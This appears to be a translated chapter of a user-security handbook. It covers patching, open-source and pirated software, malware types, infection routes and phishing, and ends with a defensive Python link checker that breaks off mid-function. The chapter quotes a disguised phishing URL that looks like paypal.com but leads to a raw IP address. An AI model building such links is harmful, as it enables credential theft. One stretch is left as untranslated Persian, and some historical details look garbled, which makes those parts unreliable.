Although the last three ways of distributing update packages are not very common, the growing need to keep software up to date means they could become an effective business strategy for ISPs and vendors in developing countries. These support strategies are welcome, but users must make sure that the local sources of updates are trustworthy too. If local sources are not trustworthy, they may turn into a centre for distributing viruses and Trojans.
Should update packages be installed immediately after release?
This debate has been going on among computer specialists for several decades. There are two opposing views:
In favour: If you install update packages quickly, you have protected yourself against known harm. With the protection that update packages provide you can guard against intrusion and disclosure of information, as far as the system allows.
Against: Programmers may make mistakes while programming, or may break another part of the program. Update packages may also contain as many bugs and vulnerabilities as the original programs. An update package may therefore create new problems that have nothing to do with the original problem.
The periodic publication of newly discovered security flaws, which attackers use to break into systems and destroy data, has changed the scope of this question. When a security flaw is announced, even when the announcement takes the form of a security patch, attackers quickly build tools to exploit it, and the computers of people who do not apply the published security patches may quickly come under attack.
Practical suggestion:
• Novice users, and people whose computers are used for non-sensitive work, should apply all update packages immediately after release. For a computer that has not been updated, the risk of new problems caused by update packages is far smaller than the risk from unpatched vulnerabilities.
• Professional users and technical staff should install security updates quickly, but can prioritize the remaining update packages according to what they do. Delaying these packages by a few weeks or months lets more adventurous users install them, discover and report any problems, and so give the producer a chance to fix the new defects before you have installed the updates.
It is never possible to say when a change will stop an application from running correctly. For this reason, if your computer is used for sensitive business activities, the best course is to test the changes on a similar but less critical machine before applying new updates.
Non-traditional and non-commercial software
The previous discussion concentrated on commercial products, including the major operating systems and applications that are common in many computing environments. How does the situation change for other software?
Small commercial software
A great deal of software is made available to the public free of charge or at minimal cost. The level of support offered by the suppliers of this software varies widely. In general, regular use of free or low-cost update packages is strongly recommended. These programs usually have no security weaknesses; rather, they are designed to solve non-security problems or to add new features. Some free software, however, such as firewalls and virus scanners, falls within our scope and will be discussed in this book.
If you use programs that perform security functions, make sure you understand the vendor's policy on providing updates. You certainly do not want to find yourself using a security-sensitive program whose update service is suddenly withdrawn, or which you cannot afford to buy. Some software, such as virus scanners, can be far more dangerous to use without regular (daily or weekly) updates than not to use at all, because using it leads you to believe that you are well protected.
Open-source software
The last point, concerning open-source software, calls for some discussion. There is a debate between supporters of open-source software and supporters of traditional proprietary software over which of these products is more secure.
Supporters of proprietary software argue that:
• Because the source code of open-source products is available, intruders can easily analyse the program and identify every bug through which the system can be penetrated.
• Because many people in different places, with no organizational ties to one another, may work on open-source products, standards may be ignored and a lack of consistency between components may lead to security vulnerabilities.
• Because users pay the producer for proprietary products, they follow the producer's instructions, and this keeps the quality of security considerations in proprietary software high.
• Because no particular body is responsible for open-source products, security is very likely to be neglected if it does not matter to the individual developers.
‫ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻦﺑﺎﺯﻱ ﻛﻪ ﺑﺴﺮﻋﺖ ﺩﺭﺣـﺎﻝ ﮔـﺴﺘﺮﺵ ﻫـﺴﺘﻨﺪ‬
‫ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﻨﺎﺳﺒﻲ ﻣـﻮﺭﺩ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‪ .‬ﺩﺭ‬
‫ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﺑﺎ ﺍﻳﻨﻜﻪ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﺍﺻﻠﻲ ﺑـﺼﻮﺭﺕ ﺭﺍﻳﮕـﺎﻥ ﻋﺮﺿـﻪ‬
‫ﻣﻲ ﺷﻮﺩ ﺍﻣﺎ ﺍﻣﻜﺎﻥ ﺩﺍﺭﺩ ﺧﺪﻣﺎﺕ ﺍﺭﺍﺋﻪ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻳﺎ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬
‫ﺁﻥ ﻫﺰﻳﻨﻪﺑﺮ ﺑﺎﺷﺪ‪ .‬ﻧﺴﺨﺔ ﺭﺍﻳﮕـﺎﻥ ‪ Red Hat Linux‬ﻛـﻪ ﺩﺭ‬
‫ﺩﺳﺘﺮﺱ ﻋﻤـﻮﻡ ﻗـﺮﺍﺭ ﻣـﻲﮔﻴـﺮﺩ ﻧﻤﻮﻧـﺔ ﺧـﻮﺑﻲ ﺍﺯ ﺍﻳـﻦ ﻗﺒﻴـﻞ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺍﺳﺖ‪ .‬ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛـﻪ ﺧﻮﺍﻫـﺎﻥ ﺳـﻄﺢ ﺑﻴـﺸﺘﺮﻱ ﺍﺯ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﻓﻨﻲ ﻫﺴﺘﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺴﺘﺔ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺍﺻﻠﻲ ﻭ ﻳﺎ‬
‫ﺣﺪﺍﻗﻞ ﺧﺪﻣﺎﺕ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺁﻧﺮﺍ ﺧﺮﻳﺪﺍﺭﻱ ﻛﻨﻨﺪ‪ .‬ﺍﮔـﺮ ﺗـﺼﻤﻴﻢ ﺑـﻪ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻳﻲ ﺩﺍﺭﻳـﺪ ﻛـﻪ ﺧﺮﻳـﺪ ﻭ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺁﻧﻬـﺎ‬
‫ﺭﺍﻳﮕﺎﻥ ﺍﺳـﺖ )ﻣﺜـﻞ ﺑﻌـﻀﻲ ﺍﺯ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺁﺯﺍﺩ ﻭ ﻣـﺘﻦﺑـﺎﺯ( ﺗﻮﺟـﻪ‬
‫ﺩﺍﺷﺘﻪﺑﺎﺷﻴﺪ ﻛﻪ ﻣـﺪﺕﺯﻣـﺎﻥ ﺩﺭ ﺩﺳـﺘﺮﺱ ﺑـﻮﺩﻥ ﻧـﺴﺨﻪﻫـﺎﻱ‬
‫ﺍﺻــﻼﺣﻲ ﺁﻧﻬــﺎ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﻛﻮﺗــﺎﻩ ﺑﺎﺷــﺪ‪ .‬ﺑﻨــﺎﺑﺮﺍﻳﻦ ﺍﮔــﺮ‬
‫ﺳﻴــﺴﺘﻢﻋﺎﻣــﻞ ﻳــﺎ ﺯﻳﺮﺳﻴــﺴﺘﻤﻬﺎﻱ ﻣﻬــﻢ ﺧــﻮﺩ ﺭﺍ ﺍﺯ ﻧــﻮﻉ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﺪﻭﻥ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﻧﺘﺨﺎﺏ ﻛﺮﺩﻩﺍﻳﺪ ﺑﺎﻳﺪ ﻧﺴﺨﺔ ﺟﺪﻳﺪ‬
‫ﺁﻧﺮﺍ ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒﺎﺭ )ﻣﺜ ﹰﻼ ﺩﺭ ﻫﺮ ﺷﺶ ﻣﺎﻩ( ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻛﻨﻴﺪ‪.‬‬
‫ﺭﻭﻧــﺪ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﻣﺤــﺼﻮﻻﺕ ﻣــﺘﻦﺑــﺎﺯ ﺑــﺴﻴﺎﺭ ﻣــﺸﻜﻠﺘﺮ ﺍﺯ‬
‫ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﻣﺤــﺼﻮﻻﺗﻲ ﻣﺜــﻞ ‪Microsoft Windows‬‬
‫ﺍﺳﺖ؛ ﺍﻣﺎ ﺑﺎ ﻭﺟﻮﺩ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﻧـﺼﺐ ﺑـﺮﺍﻱ ﻣﺤـﺼﻮﻻﺕ‬
‫ﺍﺻﻠﻲ ﻣﺘﻦﺑﺎﺯ ﺍﻳﻦ ﻣﺸﻜﻞ ﻫﻢ ﺑﺮﻃﺮﻑ ﻣﻲﺷﻮﺩ‪ .‬ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ‬
‫ﻣﺘﻦﺑﺎﺯ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Windows‬ﻧﻴﺰ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺑـﺼﻮﺭﺕ‬
‫ﻛﺎﻣﭙﺎﻳﻞﺷﺪﻩ ﺗﻮﺯﻳﻊ ﻣﻲﺷﻮﻧﺪ ﻭ ﺍﺯ ﻧﺼﺐﻛﻨﻨﺪﻩﻫﺎﻱ ﺳﺎﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﻫﻤﺎﻧﻨﺪ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ ،Windows‬ﺑﺴﺘﻪ ﻫـﺎﻱ ﺑـﻪ ﺭﻭﺯﺭﺳـﺎﻧﻲ ﻭ‬
‫ﻭﺻﻠﻪﻫﺎﻱ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺘﻦﺑﺎﺯ ﺑﺰﺭﮒ‪ ،‬ﺑﺴﺘﻪ ﺑـﻪ‬
‫ﺍﻧﺪﺍﺯﺓ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺘﻦﺑﺎﺯ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺷﻨﺎﺳﺎﻳﻲ ﻣﻨﺎﺑﻊ ﻣﺤﻠﻲ‬
‫ﺍﻳﻦ ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺑﻤﻨﻈﻮﺭ ﻛﺎﻫﺶ ﺯﻣﺎﻥ ‪download‬‬
‫ﺁﻧﻬﺎ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ ﺑﺴﻴﺎﺭ ﺣﺎﺋﺰ ﺍﻫﻤﻴﺖ ﺍﺳﺖ‪.‬‬
‫‪Open Source Software‬‬
‫‪34‬‬
‫ﻃﺮﻓﺪﺍﺭﺍﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻦﺑﺎﺯ ﻣﻌﺘﻘﺪﻧﺪ‪:‬‬
‫•‬
‫ﺑﻪ ﺩﻟﻴﻞ ﺍﻳﻨﻜﻪ ﺍﻓﺮﺍﺩ ﺯﻳﺎﺩﻱ ﺑﺎ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻛﺎﺭ‬
‫ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻣﺴﺎﺋﻞ ﻭ ﻣﺸﻜﻼﺕ ﺁﻧﻬـﺎ ﺗﻮﺳـﻂ ﺍﻓـﺮﺍﺩ ﺧﺒـﺮﻩ‬
‫ﺗﺸﺨﻴﺺ ﺩﺍﺩﻩ ﻣﻲﺷﻮﺩ ﻭ ﺳﺮﻳﻌﹰﺎ ﺍﺻﻼﺡ ﻣﻲﮔﺮﺩﺩ‪.‬‬
‫•‬
‫ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺑﺎ ﻣﺤﺼﻮﻻﺕ ﺍﻧﺤﺼﺎﺭﻱ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻣﻤﻜﻦ‬
‫ﺍﺳﺖ ﻛﺪ ﻳﻜﭙﺎﺭﭼﻪ ﺍﻱ ﺭﺍ ﺗﻮﻟﻴﺪ ﻛﻨﻨﺪ؛ ﺍﻣﺎ ﺍﮔﺮ ﺗﻮﻟﻴﺪﻛﻨﻨـﺪﻩ‬
‫ﺑﺮﺍﻱ ﺍﻣﻨﻴﺖ ﻣﺤﺼﻮﻝ ﺧﻮﺩ ﺍﺭﺯﺵ ﺧﺎﺻـﻲ ﻗﺎﺋـﻞ ﻧـﺸﺪﻩ‬
‫ﺑﺎﺷﺪ ﺑﺮﻧﺎﻣﻪ ﻧﻤﻲ ﺗﻮﺍﻧﺪ ﺍﺯ ﺳﻄﺢ ﺍﻳﻤﻨﻲ ﻣﻄﻠﻮﺑﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ‬
‫ﺑﺎﺷﺪ‪.‬‬
‫•‬
‫ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻧﺤﺼﺎﺭﻱ ﺑﺮﺍﻱ ﺍﺻﻼﺡ ﻣﺸﻜﻼﺕ ﻣﻮﺟﻮﺩ‬
‫ﻫﻤﻴﺸﻪ ﺑﺎﻳﺪ ﺑﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﺓ ﻣﺤﺼﻮﻝ ﻣﺮﺍﺟﻌﻪ ﻛﺮﺩ ﻭ ﺍﻳـﻦ‬
‫ﺍﻣﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎﻋﺚ ﺗﺄﺧﻴﺮ ﺯﻣﺎﻧﻲ ﺯﻳﺎﺩﻱ ﺷﻮﺩ‪.‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫‪٦٩‬‬
‫ﺩﺭ ﻭﺍﻗﻊ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﺩﻻﻳﻞ ﺩﺭ ﺟﺎﻳﮕﺎﻩ ﺧﻮﺩ ﺻـﺤﻴﺢ ﻫـﺴﺘﻨﺪ‪.‬‬
‫ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻤﻦ ﺑﻮﺩﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﻧﺤﺼﺎﺭﻱ ﻳﺎ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺘﻦﺑﺎﺯ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻧﻤﻲﺗﻮﺍﻥ ﺍﺩﻋﺎ ﻛـﺮﺩ ﻛـﻪ‬
‫ﻛﺸﻒ ﻭ ﺍﺻﻼﺡ ﻣﺸﻜﻼﺕ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺩﺭ ﺯﻣﺎﻥ ﻣﻨﺎﺳﺐ ﺻﻮﺭﺕ‬
‫ﻣﻲﮔﻴﺮﺩ ﻳﺎ ﺧﻴﺮ‪ .‬ﺩﺭ ﻫﺮ ﺩﻭ ﻧﻮﻉ ﻧﺮﻡﺍﻓﺰﺍﺭ‪ ،‬ﻧﻤﻮﻧـﻪﻫـﺎﻳﻲ ﺍﺯ ﺭﻓﺘـﺎﺭ‬
‫ﺍﻳﺪﻩﺁﻝ ﻭ ﻫﻤﭽﻨﻴﻦ ﺑﻲﺩﻗﺘﻲ ﻃﺮﺍﺣﺎﻥ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﺩﻳﺪﻩ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
Pirated software

Neither the authors nor the publishers of this book promote software piracy, but it would be naive to pretend that the problem does not exist. Software piracy exists throughout the world, but it occurs more often in countries where the cost of legal software relative to wages is far higher than in developed countries, where local law offices and law enforcement together make violations very unlikely.

Apart from the legal duty of those responsible to prevent infringement of the producer's ownership rights, there are two points about the security of pirated software that should be examined. Neither is very common in pirated software, but it is still possible for both to be present together.

1. Pirated software may not be updatable, or updating it may stop it from working.
2. Some pirated software may contain functions you do not expect. These may include backdoors, keyloggers, or other kinds of malicious software.
Chapter Five
Malicious Software

Overview

This chapter examines the concept and the different types of malicious software (such as viruses, Internet worms and Trojans) and the mechanisms used to distribute them.

Introduction

Malicious software

"Malware" is the short form of "malicious software". Such software is usually designed to damage or corrupt a system.

The first computer virus was identified in 1981. The concept of the computer worm was introduced in the book "Science Fiction" in 1975, and its first real activity dates from the early 1980s. Interestingly, these worms were originally designed to perform positive and useful functions. Computer Trojan horses go back to the earliest days of time sharing (the 1960s). Despite the long history of this software, it is only in recent years that its destructive effects have become severe and dangerous for ordinary users.

To begin, we must define the meaning of these terms.

Virus: A virus is a program that attaches itself to the end of another program or inserts itself into the body of another program. When that program is run, the virus runs too and inserts copies of itself into other files or disks, thereby replicating itself; whenever any of the infected files or programs is run, the process is repeated. A virus may also do other things besides this.

Internet worm: Worms resemble viruses in that they replicate copies of themselves, but they do not need a host program to do so. Like a virus, a worm may do nothing more than replicate copies of itself in various places, or it may perform other operations as well. A worm works only when the system is able to accept external resources and to run programs through those resources. Some vendors of malware-detection tools also count a worm as a kind of virus.

Trojan horse: The name of this kind of software is taken from the legend of the war of the city of Troy in Greece. In that legend the Greeks send a large wooden horse in through the city gate, and once the horse is inside the city a large number of Greek soldiers come out of it and capture the city. Since then, "Trojan horse" has meant something with an ordinary appearance but dangerous contents. In computing, a Trojan horse can cause a great deal of damage or perform actions other than those the user expects. In recent years the term has been applied to malicious programs that usually enter the system without the user's knowledge or permission and collect and send information.
"Bonus" software: Bonus software is software that, without your knowledge, contains other software packages. Including other packages in a commercial program is common. For example, if you install a web browser it may include programs such as Adobe Acrobat or multimedia software. This is because doing so usually increases the usefulness of the main software, and the usual procedure is that it installs the additional programs if you wish, or informs you at the start of their installation. The function of bonus software is usually different from that of the main software, and if you have the choice you certainly should not install it.

Trojan, virus and worm capabilities are not "exclusive" to a program. In other words, attackers can write malware with more than one characteristic, such as a self-replicating Trojan. Malware that has more than one malicious characteristic is called a blended threat. As you can see, these labels are generally defined by how the malicious software spreads and not by how it functions. This chapter examines how this software functions and the ways in which it spreads. Later chapters discuss how to secure computers and networks against it.

What malicious software does

There is no limit on what malicious software can do on your computer, but these programs usually share some common features in their activities:

Sending e-mail

Sending e-mail is one of the most common functions of malicious programs. The e-mail may carry an attachment containing a virus or worm. Its body may be written around particular information (such as Microsoft warnings about a security problem), or may even contain a random portion of your earlier e-mails that are stored on the computer. If the attachment is a dangerous file, the body usually encourages the recipient in some way to open it. The Subject and From fields are also usually set so as to encourage the user to open the attached file (like the famous worm whose subject was "I Love You"). Such messages are usually sent to people whose addresses appear in the address book or in other files on the infected computer. Sometimes the program stops once messages have been sent to all of these people, and sometimes it resumes its activity, whether from the original computer or from new origins. Note that if someone else's computer is infected with a virus or worm and that virus has put your address in the "From" field of the infected e-mail (perhaps because it found your address on the infected machine), you are the one who will be accused of distributing the virus! (This technique is called e-mail spoofing, and when a malicious program uses it, it is not easy to determine whose computer is the one actually infected.)
Gathering information

Malicious software can obtain information about your computer and the files on it and pass this information to its author. Such a program can read all the files on your computer (even encrypted files). If you store your bank account or credit card information on the computer, this data may be of interest to intruders. If you have stored an image of your signature on the computer so that you can use it when printing or sending letters, that too may be useful to attackers. Putting these pieces of information together can enable an attacker to misuse your identity. If you work at a business and store other people's credit card numbers on your computer, you will face serious problems if those numbers are stolen.

Overwriting or deleting data

Some malicious software is truly damaging: by writing data to your computer it can quickly erase the files on the hard disk or overwrite them with incorrect information. Sometimes these programs make such changes using methods that are less likely to be detected:

Installing a Trojan

This function has become very common in malicious software. Your computer usually has programs installed on it, and so the malicious program can replace a program that you or the operating system use heavily (the original meaning of a Trojan). Beyond this, it may introduce other programs into the system that run at a predetermined time or when the computer is switched on. Many of these methods are explained in the "Payload software" section.

Scheduling for the future

Any of the functions described above may take place immediately or be scheduled for the future. For example, authors of malicious software may be keen for it to be announced that a particular worm will cause major damage in the first days of January 2000.

Payload software

Malicious software usually appears as a program that sits on your computer and runs when you switch the computer on or start a particular program. The only limit on what these programs can do is the imagination and skill of their creator.

Web tracking/modification software

This class of programs watches the sites you visit and can display other pages in addition to those you would normally see. They can also replace the content of a web site with their own advertisements, and send information about your computer and the interactions you have had with its producer back to their creator. In many cases this software has complete control over your browser: it watches what you type and can change what you see, and while it monitors your browsing it can report your activities to a predetermined destination. In Internet Explorer this capability exists by design and is called BHO (Browser Helper Object, http://msdn.microsoft.com/library/enus/dnwebgen/html/bho.asp). Although a user can create harmless and very useful BHOs, this capability has also opened up considerable possibilities for building applications in which ethics are less well observed.

Backdoors

Normally you need to enter a user name and password to access a computer system, although this level of security is sometimes absent on systems that are physically secure and that only particular people can log in to from the keyboard. "Backdoor" software neutralises all such safeguards and gives a remote user access to your computer. The software may even install security safeguards of its own so that only its creator can use the system. Although the details vary from case to case, the remote user may have gained complete control over your system. Such software may even be able, if it chooses, to prevent you from continuing your work. In that case your computer is under someone else's command and you are unaware of it. The question that arises is why an attacker would want to take control of your system. There can be several reasons, including that the attacker:

• has no reason other than proving to friends that he is able to do it;
• wants to be destructive in general;
• has a personal reason for targeting you;
• uses your computer for other malicious activities, such as sending spam or carrying out a denial-of-service (DoS) attack against other computers; or
• wants to steal valuable information.

Note that software with a similar use, under names such as remote access tools or remote administration tools, is legitimate and very widely used. If you use these tools for your work, make sure that you have applied appropriate security measures such as user names and passwords.
Keyloggers

What a "keylogger" does is clear from its name. Keyloggers record every key pressed on the keyboard and store the keystrokes in a file. This file can later be retrieved through backdoor access, or be sent to the program's author by e-mail or over the web. It is worth noting that a keylogger watches everything you actually type, not what is sent over the network. So even if you enter a credit card number on a secure web page (that is, one where encryption is used when the information is transferred), this program records exactly what you type, unencrypted.

Financial theft

In most thefts that have resulted from attacks on personal computers, information has been stolen from the victim's computer. There are nevertheless cases in which payload programs have been used to steal and spend money automatically. The simplest example is a program that detects a modem on your computer and uses it to place calls to distant destinations. Since the program cannot talk, this brings the attacker no benefit, apart from a kind of devilish satisfaction that you will receive a heavy bill from the telephone company at the end of the month.

In other cases the attacker can profit personally. In many countries there may be special telephone numbers for which the telephone company charges the caller a higher rate per minute and, in return, part of that charge goes to the account of the party who was called. This arrangement is used in various kinds of transactions, but mostly by software companies that want a simple way to charge you for out-of-warranty support. In such a situation the telephone company calculates the callers' charges so that it can pass part of them, as the cost of support calls, to the company that was called. An intruder who has such a number can program your computer to call it and keep the call connected for some time. The charge will then appear on your telephone bill at the end of the month.
How is this software identified?

A few years ago the only way for personal computers to become infected by a virus or other malicious software was through the use of infected disks, and if you did not exchange files with people who had been infected you were safe. UNIX systems were not very susceptible to viruses, but because of their extensive communication capabilities and the security flaws in operating systems and some common applications, even in those days intruders were sometimes able to gain access to systems and install backdoor software on them. The first serious Internet security incident was a worm that attacked a UNIX system in 1988. Today you may be attacked in a variety of ways. The methods described below relate to Windows-based systems. Macintosh and Unix systems are somewhat less susceptible to these attacks, not necessarily because they are more secure but because Windows systems are usually more attractive targets for attackers. Unix systems come next, and Macintosh systems have so far suffered the least harm from their vulnerabilities.

E-mail

A few years ago a rumour spread among e-mail users that simply receiving an e-mail could infect you with a virus. System managers and administrators had to keep reassuring users that this was "impossible", and that as long as the attached file was not run, the machine and its users were completely safe.

Today, becoming infected through e-mail is no longer impossible and is in fact quite likely. Two capabilities that were added to e-mail software are responsible.

The first change is that there are now e-mail programs that can run attachments automatically. In the past the user saved the attached file and then ran it, but automatic execution of attachments has made things easier, especially for novice users who want to see what has been sent without any extra steps.

The second change is that, in the effort to make e-mail software simpler and more powerful, it has become possible to include HTML code in the main body of an e-mail, even though HTML can contain troublesome instructions. For example, HTML can automatically direct the web browser to a predetermined web site that may not be suitable for you or your children.

Note that the people who send such e-mails can be very creative. Recently a number of virus-infected e-mails were circulated that claimed to come from Microsoft and to contain the latest security patches to protect you against viruses and worms. These e-mails include images and logos that look trustworthy and genuine, and so persuade the user that the attachments should be run quickly. Clearly, anyone who runs the attachments will be in serious trouble.

Web sites

When the World Wide Web was launched, web pages consisted of text and images. These pages now contain more, such as dynamic programs that are downloaded to your machine and run (Javascript, Java and ActiveX). If you allow your browser to run these programs without checking the trustworthiness of the web site concerned, it may run things it should not. Javascript is generally safe, but Java and ActiveX can be very dangerous. Browsers can usually be configured not to allow these programs to run, or to ask the user's permission before running them.

Plug-ins and add-ons

Web browsers and many other programs (such as word processors and spreadsheets) allow certain programs to run from inside the main program. A common example is "Adobe Acrobat Reader", which lets you view PDF files while browsing the web. Once plug-ins or add-ons are installed they can do anything the main program can do, such as reading from and writing to the disk or using the network connection, and so they should be installed and used only when their source is completely trusted.
Security holes

Security holes are flaws in parts of the operating system or in other components of the system that allow an attacker to access the information on the system or to take control of it. In recent years most software producers have responded with acceptable speed to security problems discovered in their systems. So if you apply security patches to your system regularly, you can close the routes of intrusion to attackers before the flaws become widely known.

File sharing

File sharing exists in various forms in all operating systems. Sharing files among the employees of a company is very useful. If you have several different machines, sharing files among them is a much-needed capability. However, if you use file sharing over the Internet and do not have an appropriate security policy for it (such as using suitable user names and passwords and restricting write and update privileges), then any attacker in the world will also be able to share your files. Moreover, if you allow others to write to your disks, an attacker will be able to configure your computer as he pleases.
Drive-by downloads

A "drive-by download" occurs when you visit a web site and the HTML code on the page automatically requests a Java or ActiveX program, and that program in turn downloads another program, runs it, or arranges for it to be run in the future. HTML code can also be included in an e-mail. If you have allowed Java or ActiveX programs to install software without asking your permission or even notifying you, they will be able to download and install whatever they want.

Distrust of pirated software

Pirated commercial software is not a new concept. Counterfeit CDs have been sold for years, and their Internet versions, called Warez, are also common. It has long been suspected that these CDs may contain viruses, but the more likely risk is that this kind of software deliberately contains a patch that enables an unauthorised person to access your computer over the Internet. Since installing most software requires administrator privileges, this provides a good opportunity for programs you did not ask for to be installed.

Hidden functions of legitimate software

Although most of the software you download may be harmless, there is a high chance that downloaded software (especially free software) will install other programs on your machine. Peer-to-peer file-sharing programs are very prone to this. These programs usually include other programs, many of which fall into the category of web tracking and modification software: they watch your web browsing, display all kinds of advertisements and report your activities to their master. Some of these programs are devious, in that they try to hide themselves and to be almost impossible to remove. Such a program has an uninstall tool which, when you run it, deletes the uninstall tool itself, while the main program is still there and will still run.
Non-resident malware

Not all malware runs on your computer. It has become very common for such software to send an e-mail that in some way entices the user to visit a web site of its choosing. The traditional trick is for the e-mail to offer you something you are interested in; while you are viewing the advertised web site, a number of malicious programs attack your system and perhaps download some kind of software onto it (similar to "drive-by downloads") or carry out other operations.

In newer methods, the e-mail claims to be a statement from eBay (an Internet auction web site) or PayPal (a web site for Internet payments), or to come from your bank. The e-mail looks very trustworthy and shows you web sites on which you can validate your credit card number. The URLs these e-mails present are usually also very similar to genuine URLs. For example, the real URL of PayPal is www.paypal.com, and the URL displayed in the e-mail may be exactly that address. However, what is shown on the page is not the actual URL used to reach that page. The actual URL is usually hidden and may look like this:

http://www.paypal.com:user=3245329:transaction=43293:[email protected]

Someone who is not familiar with the subtleties of the URL format will assume that this address is the same as www.paypal.com and is therefore trustworthy, but in fact the characters before the @ sign should be disregarded, because this URL connects to the address 218.5.79.162. The web site at that address usually hosts a page that resembles the real PayPal page and asks you to log in and enter your credit card number. In reality this web site never connects to PayPal; it belongs to someone who is trying to steal your credit card and the information related to it. These tricks have been very successful in practice. Note that similar e-mails may be harmless, legitimate messages that really were sent by PayPal.

An official e-mail sent for this purpose usually contains unique information that cannot be obtained from your e-mail address, such as your full name or the last four digits of your credit card. If the e-mail directs you to a web site it will also give you the address, but it will not contain a hyperlink. The destination web pages also contain information that no fraudster or spammer could know. If you still have doubts, for greater assurance you can contact the company concerned by telephone (not by e-mail) and confirm that the message is genuine.
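The disguised-URL trick described above can be checked mechanically. The following is an added example, not code from the handbook: it extracts every link from an HTML e-mail body and reports the host the link really connects to. The sample body, the example-bank.com and example.net names and the 192.0.2.10 documentation address are constructed for illustration, and the finding labels are this example's own.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample body. The first href has the same shape as the disguised
# URL quoted in the text; 192.0.2.10 is a documentation address, not a real host.
SAMPLE_HTML = """
<p>Please confirm your card:
<a href="http://www.example-bank.com:user=3245329:transaction=43293:token@192.0.2.10/">www.example-bank.com</a></p>
<p><a href="https://www.example-bank.com/account">example-bank.com</a></p>
<p><a href="http://login.example.net/">https://www.example-bank.com/login</a></p>
"""


class AnchorCollector(HTMLParser):
    """Collect (href, visible text) for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def bare_host(host):
    """Lower-case a host name and drop a leading 'www.' for comparison."""
    host = (host or "").lower().rstrip(".")
    return host[4:] if host.startswith("www.") else host


def check_link(href, visible_text=""):
    """Return the host a link really targets plus any deception findings."""
    parts = urlsplit(href)
    result = {"href": href, "text": visible_text, "real_host": "",
              "decoy": "", "findings": []}
    if parts.scheme not in ("http", "https"):
        return result
    # urlsplit takes the host from the text AFTER the last '@' in the authority.
    host = (parts.hostname or "").lower()
    result["real_host"] = host
    if "@" in parts.netloc:
        # Everything before '@' is user information the browser does not
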